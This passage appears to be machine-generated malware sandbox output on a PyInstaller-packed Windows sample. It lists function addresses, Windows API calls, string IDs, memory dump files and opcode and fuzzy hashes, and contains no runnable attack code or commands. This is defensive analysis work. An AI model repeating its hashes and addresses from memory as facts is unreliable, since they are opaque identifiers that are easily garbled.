                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5D08C11B2424542FA48F777BA467699252AB89BC0F88C076EE1D03B4EDC3CC0418B00
                                                                                                                                                                                                                              Function 00007FF7EAD1D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,00007FF7EAD10C90,?,?,?,00007FF7EAD122FA,?,?,?,?,?,00007FF7EAD13AE9), ref: 00007FF7EAD1D63A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4292702814-0
                                                                                                                                                                                                                              • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction ID: 4e75942390d74251708174c86bbe5854b8d2a36d7cea8b24552fb5be8cf2454a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AF0D450B0924A45FE65B7B158417759394DFA4BA0FC806B2D9BE862CADF3CA4808672

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF7EAD089E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction ID: 235a67f0b1412dbbdebda2e637d2da7591839ba84bc1f88a3a8e8885d7006363
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81D19432A08A8286F710EF34E8943ADB765FF94B58F800276DA5D43A98DF7CD154C721
                                                                                                                                                                                                                              Function 00007FF8E80F5CBC Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 364COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007F874
                                                                                                                                                                                                                              • String ID: %X:%X:%X:%X:%X:%X:%X:%X$%d.%d.%d.%d$<INVALID>$<invalid>$DNS$DirName$IP Address$Invalid value %.200s$Registered ID$URI$Unknown general name type %d$email$failed to allocate BIO
                                                                                                                                                                                                                              • API String ID: 3612976672-4109427827
                                                                                                                                                                                                                              • Opcode ID: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                              • Instruction ID: 3a55ef73a50a13c22e00d4146dfa27396ee97a9ceb6d9244052f6d6866c94d08
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3a8733b9f8724a0ad4dac92debb2868cdbdf7ad001dd02e936b03acc83697b27
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F15E32A0DA8286FE658BA1A85833D67A1BF85BC1F48C435DA5E467D0DF3CF514C70A
                                                                                                                                                                                                                              Function 00007FF8E7963248 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1488870171.00007FF8E7961000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8E7960000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488485527.00007FF8E7960000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79AA000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E79B8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0C000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1488870171.00007FF8E7A0F000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489614277.00007FF8E7A10000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489734191.00007FF8E7A12000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7960000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: 00007ExceptionF8751FilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1180211362-0
                                                                                                                                                                                                                              • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                              • Instruction ID: f9e3a05f61c57739c4702db93db31246234c44cb14f5f8f2e9271ba6b912f26f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2312AB2608B8286EB60AFA1E8443AD6371FB84784F40413ADA6E47B99DF3CD548C711
                                                                                                                                                                                                                              Function 00007FF7EAD083C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD0842B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084AE
                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084CD
                                                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084DB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084EC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF7EAD08919,00007FF7EAD03FA5), ref: 00007FF7EAD084F5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction ID: 583ef5b254f7ff1f7114440e18d99883d7db02a05b27b2c37a6eead3137a212d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4414121A0CA8285FA20EB24E4843BEB362FB94758FC00273D59D4269CEF7CE555C762
                                                                                                                                                                                                                              Function 00007FF8E7A2212B Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1490107533.00007FF8E7A21000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8E7A20000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1489932395.00007FF8E7A20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7ACD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AD8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1490107533.00007FF8E7AE3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493021775.00007FF8E7AE7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493179025.00007FF8E7AE9000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e7a20000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                              • Instruction ID: 2cf2ed9a7c7ec29d25f1bad7313fc5ab5e79b5ddf4c6a3d30a84afb0d25fa96b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D4313C76709A8186EB608FA1E8417ED73A0FB88788F44403ADB5E47B95DF3CD548C701
                                                                                                                                                                                                                              Function 00007FF8E8133318 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8E8130000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495728438.00007FF8E8130000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8141000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8143000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496149556.00007FF8E8146000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1496995524.00007FF8E8147000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1497677293.00007FF8E8148000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e8130000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
                                                                                                                                                                                                                              • Instruction ID: 02c638f09594fe8918723b3a1d5a2ff0e0f5692a82cc834209b0834f5e796133
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb2c844973f8a307a2fb197422134c0be9fa62acd3dd33c558e307c9d71f774
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54315E72609B8186EB609FA0E8803ED7374FB85B88F05443ADA4E57B94DF3CD548C709
                                                                                                                                                                                                                              Function 00007FF7EAD0D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction ID: 7690faec4d4eb51db33b0a18cf866503fa47c1b85a6e53cf763e3c4af380cf83
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E311072608B818AEB60DF60E8803ED7365FB94748F44407BDA4D47B98DF78D548C721
                                                                                                                                                                                                                              Function 00007FF8E80F339C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1495132572.00007FF8E80F1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8E80F0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494989941.00007FF8E80F0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E8111000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811A000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495132572.00007FF8E811E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495565226.00007FF8E8121000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1495640960.00007FF8E8123000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                              • Instruction ID: 6a130a50800aead81d05da99c36de12e3ede94f30fa31d23e5b546feae89f4f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e86fcbda8d44a87da12ad3cbe0ff2274eff02410a8037cee209cf92a2e866f6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 28311A72609B818AEB60CFA0E8407ED7365FB84794F44843ADA4E47B94EF3CD548C719
                                                                                                                                                                                                                              Function 00007FF8E80D4390 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FF8E80D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493237876.00007FF8E80D0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80DD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1493380127.00007FF8E80E0000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494657271.00007FF8E80E1000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1494938031.00007FF8E80E3000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff8e80d0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                              • Instruction ID: ebbcb5b168c0d5bea8521b5041411b2cd34b83ff4e8ddfa9e4094ce9ef007743
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b94263228284adea3e7e1cdca652a094aa349ee7aad73e387e1651aa79022c0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6311A72609B8187EB609FA0E8503EE7764FB84794F44803ADA4E47BD9DF3CD6488B15
                                                                                                                                                                                                                              Function 00007FF7EAD25C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C45
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD25598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD255AC
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: HeapFree.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A95E
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A948: GetLastError.KERNEL32(?,?,?,00007FF7EAD22D22,?,?,?,00007FF7EAD22D5F,?,?,00000000,00007FF7EAD23225,?,?,?,00007FF7EAD23157), ref: 00007FF7EAD1A968
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A909
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD1A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7EAD1A8DF,?,?,?,?,?,00007FF7EAD1A7CA), ref: 00007FF7EAD1A92E
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25C34
                                                                                                                                                                                                                                • Part of subcall function 00007FF7EAD255F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7EAD2560C
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EAA
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25EBB
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF7EAD25ECC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7EAD2610C), ref: 00007FF7EAD25EF3
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4070488512-0
                                                                                                                                                                                                                              • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                              • Instruction ID: feef039ee7deb00c37f8ee75818b46884c4f7fb5df07af97e66af3a7906f4d7b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8D1AE26A0824246F720FF25D881BB9A761EF94794FC481B7EA0D47699EE3CE441C772
                                                                                                                                                                                                                              Function 00007FF7EAD1A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000002.00000002.1469032874.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1467847222.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469085811.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469130641.00007FF7EAD41000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000002.00000002.1469304096.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
